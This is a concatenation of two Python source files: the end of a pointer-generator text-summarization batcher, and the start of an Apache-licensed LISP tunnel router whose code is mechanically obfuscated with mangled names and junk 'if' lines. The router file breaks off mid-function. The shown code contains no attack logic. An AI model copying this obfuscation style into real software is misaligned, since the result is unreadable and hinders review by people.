self.original_abstract = abstract
self.original_abstract_sents = abstract_sentences
def get_dec_inp_targ_seqs(self, sequence, max_len, start_id, stop_id):
"""Given the reference summary as a sequence of tokens, return the input sequence for the decoder, and the target sequence which we will use to calculate loss. The sequence will be truncated if it is longer than max_len. The input sequence must start with the start_id and the target sequence must end with the stop_id (but not if it's been truncated).
Args:
sequence: List of ids (integers)
max_len: integer
start_id: integer
stop_id: integer
Returns:
inp: sequence length <=max_len starting with start_id
target: sequence same length as input, ending with stop_id only if there was no truncation
"""
inp = [start_id] + sequence[:]
target = sequence[:]
if len(inp) > max_len: # truncate
inp = inp[:max_len]
target = target[:max_len] # no end_token
else: # no truncation
target.append(stop_id) # end token
assert len(inp) == len(target)
return inp, target
def pad_decoder_inp_targ(self, max_len, pad_id):
"""Pad decoder input and target sequences with pad_id up to max_len."""
while len(self.dec_input) < max_len:
self.dec_input.append(pad_id)
while len(self.target) < max_len:
self.target.append(pad_id)
def pad_encoder_input(self, max_len, pad_id):
"""Pad the encoder input sequence with pad_id up to max_len."""
while len(self.enc_input) < max_len:
self.enc_input.append(pad_id)
if self.hps.pointer_gen.value:
while len(self.enc_input_extend_vocab) < max_len:
self.enc_input_extend_vocab.append(pad_id)
class Batch(object):
"""Class representing a minibatch of train/val/test examples for text summarization."""
def __init__(self, example_list, hps, vocab):
"""Turns the example_list into a Batch object.
Args:
example_list: List of Example objects
hps: hyperparameters
vocab: Vocabulary object
"""
self.pad_id = vocab.word2id(data.PAD_TOKEN) # id of the PAD token used to pad sequences
self.init_encoder_seq(example_list, hps) # initialize the input to the encoder
self.init_decoder_seq(example_list, hps) # initialize the input and targets for the decoder
self.store_orig_strings(example_list) # store the original strings
def init_encoder_seq(self, example_list, hps):
"""Initializes the following:
self.enc_batch:
numpy array of shape (batch_size, <=max_enc_steps) containing integer ids (all OOVs represented by UNK id), padded to length of longest sequence in the batch
self.enc_lens:
numpy array of shape (batch_size) containing integers. The (truncated) length of each encoder input sequence (pre-padding).
self.enc_padding_mask:
numpy array of shape (batch_size, <=max_enc_steps), containing 1s and 0s. 1s correspond to real tokens in enc_batch and target_batch; 0s correspond to padding.
If hps.pointer_gen, additionally initializes the following:
self.max_art_oovs:
maximum number of in-article OOVs in the batch
self.art_oovs:
list of list of in-article OOVs (strings), for each example in the batch
self.enc_batch_extend_vocab:
Same as self.enc_batch, but in-article OOVs are represented by their temporary article OOV number.
"""
# Determine the maximum length of the encoder input sequence in this batch
max_enc_seq_len = max([ex.enc_len for ex in example_list])
# Pad the encoder input sequences up to the length of the longest sequence
for ex in example_list:
ex.pad_encoder_input(max_enc_seq_len, self.pad_id)
# Initialize the numpy arrays
# Note: our enc_batch can have different length (second dimension) for each batch because we use dynamic_rnn for the encoder.
self.enc_batch = np.zeros((hps.batch_size.value, max_enc_seq_len), dtype=np.int32)
self.enc_lens = np.zeros((hps.batch_size.value), dtype=np.int32)
self.enc_padding_mask = np.zeros((hps.batch_size.value, max_enc_seq_len), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.enc_batch[i, :] = ex.enc_input[:]
self.enc_lens[i] = ex.enc_len
for j in range(ex.enc_len):
self.enc_padding_mask[i][j] = 1
# For pointer-generator mode, need to store some extra info
if hps.pointer_gen.value:
# Determine the max number of in-article OOVs in this batch
self.max_art_oovs = max([len(ex.article_oovs) for ex in example_list])
# Store the in-article OOVs themselves
self.art_oovs = [ex.article_oovs for ex in example_list]
# Store the version of the enc_batch that uses the article OOV ids
self.enc_batch_extend_vocab = np.zeros((hps.batch_size.value, max_enc_seq_len), dtype=np.int32)
for i, ex in enumerate(example_list):
self.enc_batch_extend_vocab[i, :] = ex.enc_input_extend_vocab[:]
def init_decoder_seq(self, example_list, hps):
"""Initializes the following:
self.dec_batch:
numpy array of shape (batch_size, max_dec_steps), containing integer ids as input for the decoder, padded to max_dec_steps length.
self.target_batch:
numpy array of shape (batch_size, max_dec_steps), containing integer ids for the target sequence, padded to max_dec_steps length.
self.dec_padding_mask:
numpy array of shape (batch_size, max_dec_steps), containing 1s and 0s. 1s correspond to real tokens in dec_batch and target_batch; 0s correspond to padding.
"""
# Pad the inputs and targets
for ex in example_list:
ex.pad_decoder_inp_targ(hps.max_dec_steps.value, self.pad_id)
# Initialize the numpy arrays.
# Note: our decoder inputs and targets must be the same length for each batch (second dimension = max_dec_steps) because we do not use a dynamic_rnn for decoding. However I believe this is possible, or will soon be possible, with Tensorflow 1.0, in which case it may be best to upgrade to that.
self.dec_batch = np.zeros((hps.batch_size.value, hps.max_dec_steps.value), dtype=np.int32)
self.target_batch = np.zeros((hps.batch_size.value, hps.max_dec_steps.value), dtype=np.int32)
self.dec_padding_mask = np.zeros((hps.batch_size.value, hps.max_dec_steps.value), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.dec_batch[i, :] = ex.dec_input[:]
self.target_batch[i, :] = ex.target[:]
for j in range(ex.dec_len):
self.dec_padding_mask[i][j] = 1
def store_orig_strings(self, example_list):
"""Store the original article and abstract strings in the Batch object"""
self.original_articles = [ex.original_article for ex in example_list] # list of lists
self.original_abstracts = [ex.original_abstract for ex in example_list] # list of lists
self.original_abstracts_sents = [ex.original_abstract_sents for ex in example_list] # list of list of lists
class Batcher(object):
"""A class to generate minibatches of data. Buckets examples together based on length of the encoder sequence."""
BATCH_QUEUE_MAX = 100 # max number of batches the batch_queue can hold
def __init__(self, data_path, vocab, hps, single_pass):
"""Initialize the batcher. Start threads that process the data into batches.
Args:
data_path: tf.Example filepattern.
vocab: Vocabulary object
hps: hyperparameters
single_pass: If True, run through the dataset exactly once (useful for when you want to run evaluation on the dev or test set). Otherwise generate random batches indefinitely (useful for training).
"""
self._data_path = data_path
self._vocab = vocab
self._hps = hps
self._single_pass = single_pass
# Initialize a queue of Batches waiting to be used, and a queue of Examples waiting to be batched
self._batch_queue = Queue.Queue(self.BATCH_QUEUE_MAX)
self._example_queue = Queue.Queue(self.BATCH_QUEUE_MAX * self._hps.batch_size.value)
# Different settings depending on whether we're in single_pass mode or not
if single_pass:
self._num_example_q_threads = 1 # just one thread, so we read through the dataset just once
self._num_batch_q_threads = 1 # just one thread to batch examples
self._bucketing_cache_size = 1 # only load one batch's worth of examples before bucketing; this essentially means no bucketing
self._finished_reading = False # this will tell us when we're finished reading the dataset
else:
self._num_example_q_threads = 16 # num threads to fill example queue
self._num_batch_q_threads = 4 # num threads to fill batch queue
self._bucketing_cache_size = 100 # how many batches-worth of examples to load into cache before bucketing
# Start the threads that load the queues
self._example_q_threads = []
for _ in range(self._num_example_q_threads):
self._example_q_threads.append(Thread(target=self.fill_example_queue))
self._example_q_threads[-1].daemon = True
self._example_q_threads[-1].start()
self._batch_q_threads = []
for _ in range(self._num_batch_q_threads):
self._batch_q_threads.append(Thread(target=self.fill_batch_queue))
self._batch_q_threads[-1].daemon = True
self._batch_q_threads[-1].start()
# Start a thread that watches the other threads and restarts them if they're dead
if not single_pass: # We don't want a watcher in single_pass mode because the threads shouldn't run forever
self._watch_thread = Thread(target=self.watch_threads)
self._watch_thread.daemon = True
self._watch_thread.start()
def next_batch(self):
"""Return a Batch from the batch queue.
If mode='decode' then each batch contains a single example repeated beam_size-many times; this is necessary for beam search.
Returns:
batch: a Batch object, or None if we're in single_pass mode and we've exhausted the dataset.
"""
# If the batch queue is empty, print a warning
if self._batch_queue.qsize() == 0:
tf.logging.warning('Bucket input queue is empty when calling next_batch. Bucket queue size: %i, Input queue size: %i', self._batch_queue.qsize(), self._example_queue.qsize())
if self._single_pass and self._finished_reading:
tf.logging.info("Finished reading dataset in single_pass mode.")
return None
batch = self._batch_queue.get() # get the next Batch
return batch
def fill_example_queue(self):
"""Reads data from file and processes into Examples which are then placed into the example queue."""
input_gen = self.text_generator(data.example_generator(self._data_path, self._single_pass))
while True:
try:
(article, abstract) = next(input_gen) # read the next example from file. article and abstract are both strings.
except StopIteration: # if there are no more examples:
tf.logging.info("The example generator for this example queue filling thread has exhausted data.")
if self._single_pass:
tf.logging.info("single_pass mode is on, so we've finished reading dataset. This thread is stopping.")
self._finished_reading = True
break
else:
raise Exception("single_pass mode is off but the example generator is out of data; error.")
abstract_sentences = [sent.strip() for sent in data.abstract2sents(abstract)] # Use the <s> and </s> tags in abstract to get a list of sentences.
example = Example(article, abstract_sentences, self._vocab, self._hps) # Process into an Example.
self._example_queue.put(example) # place the Example in the example queue.
def fill_batch_queue(self):
"""Takes Examples out of example queue, sorts them by encoder sequence length, processes into Batches and places them in the batch queue.
In decode mode, makes batches that each contain a single example repeated.
"""
while True:
if self._hps.mode.value != 'decode':
# Get bucketing_cache_size-many batches of Examples into a list, then sort
inputs = []
for _ in range(self._hps.batch_size.value * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
inputs = sorted(inputs, key=lambda inp: inp.enc_len) # sort by length of encoder sequence
# Group the sorted Examples into batches, optionally shuffle the batches, and place in the batch queue.
batches = []
for i in range(0, len(inputs), self._hps.batch_size.value):
batches.append(inputs[i:i + self._hps.batch_size.value])
if not self._single_pass:
shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(Batch(b, self._hps, self._vocab))
else: # beam search decode mode
ex = self._example_queue.get()
b = [ex for _ in range(self._hps.batch_size)]
self._batch_queue.put(Batch(b, self._hps, self._vocab))
def watch_threads(self):
"""Watch example queue and batch queue threads and restart if dead."""
while True:
time.sleep(60)
for idx,t in enumerate(self._example_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found example queue thread dead. Restarting.')
new_t = Thread(target=self.fill_example_queue)
self._example_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
for idx,t in enumerate(self._batch_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found batch queue thread dead. Restarting.')
new_t = Thread(target=self.fill_batch_queue)
self._batch_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
def text_generator(self, example_generator):
"""Generates article and abstract text from tf.Example.
Args:
example_generator: a generator of tf.Examples from file. See data.example_generator"""
while True:
e = next(example_generator) # e is a tf.Example
try:
article_text = e.features.feature['article'].bytes_list.value[0].decode() # the article text was saved under the key 'article' in the data files
abstract_text = e.features.feature['abstract'].bytes_list.value[0].decode() # the abstract text was saved under the key 'abstract' in the data files
except ValueError:
tf.logging.error('Failed to get article or abstract from example')
continue
if len(article_text)==0: # See https://github.com/abisee/pointer-generator/issues/1
tf.logging.warning('Found an example with empty article text. Skipping it.')
else:
yield (article_text, abstract_text)
|
lisp-rtr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsualting Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
from future import standard_library
standard_library . install_aliases ( )
from builtins import chr
from builtins import str
from builtins import range
import lisp
import lispconfig
import socket
import time
import select
import threading
import os
import copy
from subprocess import getoutput
import binascii
try :
import pcappy
except :
pass
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
import pcapy
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
Oo0o = [ None , None , None ]
OOO0o0o = None
Ii1iI = None
Oo = None
I1Ii11I1Ii1i = None
Ooo = lisp . lisp_get_ephemeral_port ( )
o0oOoO00o = None
i1 = None
oOOoo00O0O = None
if 15 - 15: I1IiiI
O0ooo00OOo00 = [ ]
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
if 58 - 58: i11iIiiIii % I1Ii111
if 54 - 54: OOooOOo % O0 + I1IiiI - iII111i / I11i
iIiiI1 = None
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
oo0Ooo0 = ( os . getenv ( "LISP_RTR_FAST_DATA_PLANE" ) != None )
I1I11I1I1I = ( os . getenv ( "LISP_RTR_LATENCY_DEBUG" ) != None )
if 90 - 90: II111iiii + oO0o / o0oOOo0O0Ooo % II111iiii - O0
if 29 - 29: o0oOOo0O0Ooo / iIii1I11I1II1
if 24 - 24: O0 % o0oOOo0O0Ooo + i1IIi + I1Ii111 + I1ii11iIi11i
if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
if 23 - 23: i11iIiiIii + I1IiiI
if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
if 40 - 40: oO0o . OoOoOO00 . Oo0Ooo . i1IIi
if 33 - 33: Ii1I + II111iiii % i11iIiiIii . ooOoO0o - I1IiiI
def O00oooo0O ( parameter ) :
global O0ooo00OOo00
if 22 - 22: OoooooooOO % I11i - iII111i . iIii1I11I1II1 * i11iIiiIii
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" ,
O0ooo00OOo00 ) )
if 32 - 32: Oo0Ooo * O0 % oO0o % Ii1I . IiII
if 61 - 61: ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
def Ii1IOo0o0 ( parameter ) :
global O0ooo00OOo00
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" , O0ooo00OOo00 ,
True ) )
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
def o00oOO0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "RTR" ) )
if 95 - 95: OOooOOo / OoooooooOO
if 18 - 18: i11iIiiIii
if 46 - 46: i1IIi / I11i % OOooOOo + I1Ii111
if 79 - 79: I1Ii111 - o0oOOo0O0Ooo + I1Ii111 - iII111i
if 8 - 8: I1IiiI
if 75 - 75: iIii1I11I1II1 / OOooOOo % o0oOOo0O0Ooo * OoOoOO00
if 9 - 9: OoO0O00
def i11 ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
def O0O0O ( kv_pair ) :
oO0Oo = { "rloc-probe" : False , "igmp-query" : False }
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
for O0o0 in list ( kv_pair . keys ( ) ) :
OO00Oo = kv_pair [ O0o0 ]
if 51 - 51: IiII * o0oOOo0O0Ooo + I11i + OoO0O00
if ( O0o0 == "instance-id" ) :
o0O0O00 = OO00Oo . split ( "-" )
oO0Oo [ "instance-id" ] = [ 0 , 0 ]
if ( len ( o0O0O00 ) == 1 ) :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 0 ] )
else :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 1 ] )
if 86 - 86: I11i / IiII % i11iIiiIii
if 7 - 7: ooOoO0o * OoO0O00 % oO0o . IiII
if ( O0o0 == "eid-prefix" ) :
Ii1iIiII1ii1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Ii1iIiII1ii1 . store_prefix ( OO00Oo )
oO0Oo [ "eid-prefix" ] = Ii1iIiII1ii1
if 62 - 62: iIii1I11I1II1 * OoOoOO00
if ( O0o0 == "group-prefix" ) :
i1OOO = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
i1OOO . store_prefix ( OO00Oo )
oO0Oo [ "group-prefix" ] = i1OOO
if 59 - 59: II111iiii + OoooooooOO * OoOoOO00 + i1IIi
if ( O0o0 == "rloc-prefix" ) :
Oo0OoO00oOO0o = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Oo0OoO00oOO0o . store_prefix ( OO00Oo )
oO0Oo [ "rloc-prefix" ] = Oo0OoO00oOO0o
if 80 - 80: oO0o + OOooOOo - OOooOOo % iII111i
if ( O0o0 == "rloc-probe" ) :
oO0Oo [ "rloc-probe" ] = ( OO00Oo == "yes" )
if 63 - 63: I1IiiI - I1ii11iIi11i + O0 % I11i / iIii1I11I1II1 / o0oOOo0O0Ooo
if ( O0o0 == "igmp-query" ) :
oO0Oo [ "igmp-query" ] = ( OO00Oo == "yes" )
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
for o000O0o in lisp . lisp_glean_mappings :
if ( ( "eid-prefix" in o000O0o ) ^ ( "eid-prefix" in oO0Oo ) ) : continue
if ( ( "eid-prefix" in o000O0o ) and ( "eid-prefix" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "eid-prefix" ]
oO0OOoo0OO = oO0Oo [ "eid-prefix" ]
if ( iI1iII1 . is_exact_match ( oO0OOoo0OO ) == False ) : continue
if 65 - 65: Ii1I . iIii1I11I1II1 / O0 - Ii1I
if 21 - 21: I1IiiI * iIii1I11I1II1
if ( ( "group-prefix" in o000O0o ) ^ ( "group-prefix" in oO0Oo ) ) : continue
if ( ( "group-prefix" in o000O0o ) and ( "group-prefix" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "group-prefix" ]
oO0OOoo0OO = oO0Oo [ "group-prefix" ]
if ( iI1iII1 . is_exact_match ( oO0OOoo0OO ) == False ) : continue
if 91 - 91: IiII
if 15 - 15: II111iiii
if ( ( "rloc-prefix" in o000O0o ) ^ ( "rloc-prefix" in oO0Oo ) ) : continue
if ( ( "rloc-prefix" in o000O0o ) and ( "rloc-prefix" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "rloc-prefix" ]
oO0OOoo0OO = oO0Oo [ "rloc-prefix" ]
if ( iI1iII1 . is_exact_match ( oO0OOoo0OO ) == False ) : continue
if 18 - 18: i11iIiiIii . i1IIi % OoooooooOO / O0
if 75 - 75: OoOoOO00 % o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1Ii111
if ( ( "instance-id" in o000O0o ) ^ ( "instance-id" in oO0Oo ) ) : continue
if ( ( "instance-id" in o000O0o ) and ( "instance-id" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "instance-id" ]
oO0OOoo0OO = oO0Oo [ "instance-id" ]
if ( iI1iII1 != oO0OOoo0OO ) : continue
if 5 - 5: o0oOOo0O0Ooo * ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if 91 - 91: O0
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
return
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
lisp . lisp_glean_mappings . append ( oO0Oo )
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
if 68 - 68: OoOoOO00 - OoO0O00
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
def iiii ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "RTR" ) )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
def oo0o00O ( mc , parms ) :
o00O0OoO , Oo0OoO00oOO0o , i1I , OoOO = parms
if 53 - 53: Oo0Ooo
iI1Iii = "{}:{}" . format ( Oo0OoO00oOO0o . print_address_no_iid ( ) , i1I )
Ii1iIiII1ii1 = lisp . green ( mc . print_eid_tuple ( ) , False )
oO00OOoO00 = "Changed '{}' translated address:port to {} for EID {}, {} {}" . format ( OoOO , lisp . red ( iI1Iii , False ) , Ii1iIiII1ii1 , "{}" , "{}" )
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
for i1I1iI1iIi111i in mc . rloc_set :
if ( i1I1iI1iIi111i . rle ) :
for iiIi1IIi1I in i1I1iI1iIi111i . rle . rle_nodes :
if ( iiIi1IIi1I . rloc_name != OoOO ) : continue
iiIi1IIi1I . store_translated_rloc ( Oo0OoO00oOO0o , i1I )
o0OoOO000ooO0 = iiIi1IIi1I . address . print_address_no_iid ( ) + ":" + str ( iiIi1IIi1I . translated_port )
if 56 - 56: iII111i
lisp . lprint ( oO00OOoO00 . format ( "RLE" , o0OoOO000ooO0 ) )
if 86 - 86: II111iiii % I1Ii111
if 15 - 15: i1IIi * I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if ( i1I1iI1iIi111i . rloc_name != OoOO ) : continue
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
o0OoOO000ooO0 = i1I1iI1iIi111i . rloc . print_address_no_iid ( ) + ":" + str ( i1I1iI1iIi111i . translated_port )
if 62 - 62: OOooOOo + O0
if ( o0OoOO000ooO0 in lisp . lisp_crypto_keys_by_rloc_encap ) :
oO0OOOO0 = lisp . lisp_crypto_keys_by_rloc_encap [ o0OoOO000ooO0 ]
lisp . lisp_crypto_keys_by_rloc_encap [ iI1Iii ] = oO0OOOO0
if 26 - 26: Ii1I
if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
if 47 - 47: iII111i - Ii1I . II111iiii + OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
i1I1iI1iIi111i . delete_from_rloc_probe_list ( mc . eid , mc . group )
i1I1iI1iIi111i . store_translated_rloc ( Oo0OoO00oOO0o , i1I )
i1I1iI1iIi111i . add_to_rloc_probe_list ( mc . eid , mc . group )
lisp . lprint ( oO00OOoO00 . format ( "RLOC" , o0OoOO000ooO0 ) )
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if 100 - 100: I1Ii111 * O0
if ( lisp . lisp_rloc_probing ) :
o00oO0oo0OO = None if ( mc . group . is_null ( ) ) else mc . eid
O0O0OOOOoo = mc . eid if ( mc . group . is_null ( ) ) else mc . group
lisp . lisp_send_map_request ( o00O0OoO , 0 , o00oO0oo0OO , O0O0OOOOoo , i1I1iI1iIi111i )
if 74 - 74: I1ii11iIi11i + II111iiii / OoO0O00
if 100 - 100: OoOoOO00 * iIii1I11I1II1
if 86 - 86: OoO0O00 * OOooOOo . iII111i
if 32 - 32: o0oOOo0O0Ooo . IiII * I11i
if 93 - 93: o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
lisp . lisp_write_ipc_map_cache ( True , mc )
return ( True , parms )
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
def ii1111iII ( mc , parms ) :
if 32 - 32: i1IIi / II111iiii . Oo0Ooo
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if ( mc . group . is_null ( ) ) : return ( oo0o00O ( mc , parms ) )
if 97 - 97: O0 + OoOoOO00
if ( mc . source_cache == None ) : return ( True , parms )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
mc . source_cache . walk_cache ( oo0o00O , parms )
return ( True , parms )
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
def OooOo0ooo ( sockets , hostname , rloc , port ) :
lisp . lisp_map_cache . walk_cache ( ii1111iII ,
[ sockets , rloc , port , hostname ] )
return
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
def I1II1 ( sred , packet ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 86 - 86: iIii1I11I1II1 / OoOoOO00 . II111iiii
if ( sred in [ "Send" , "Receive" ] ) :
II1i111Ii1i = binascii . hexlify ( packet [ 0 : 20 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}" . format ( sred , II1i111Ii1i [ 0 : 8 ] , II1i111Ii1i [ 8 : 16 ] ,
II1i111Ii1i [ 16 : 24 ] , II1i111Ii1i [ 24 : 32 ] , II1i111Ii1i [ 32 : 40 ] ) )
elif ( sred in [ "Encap" , "Decap" ] ) :
II1i111Ii1i = binascii . hexlify ( packet [ 0 : 36 ] )
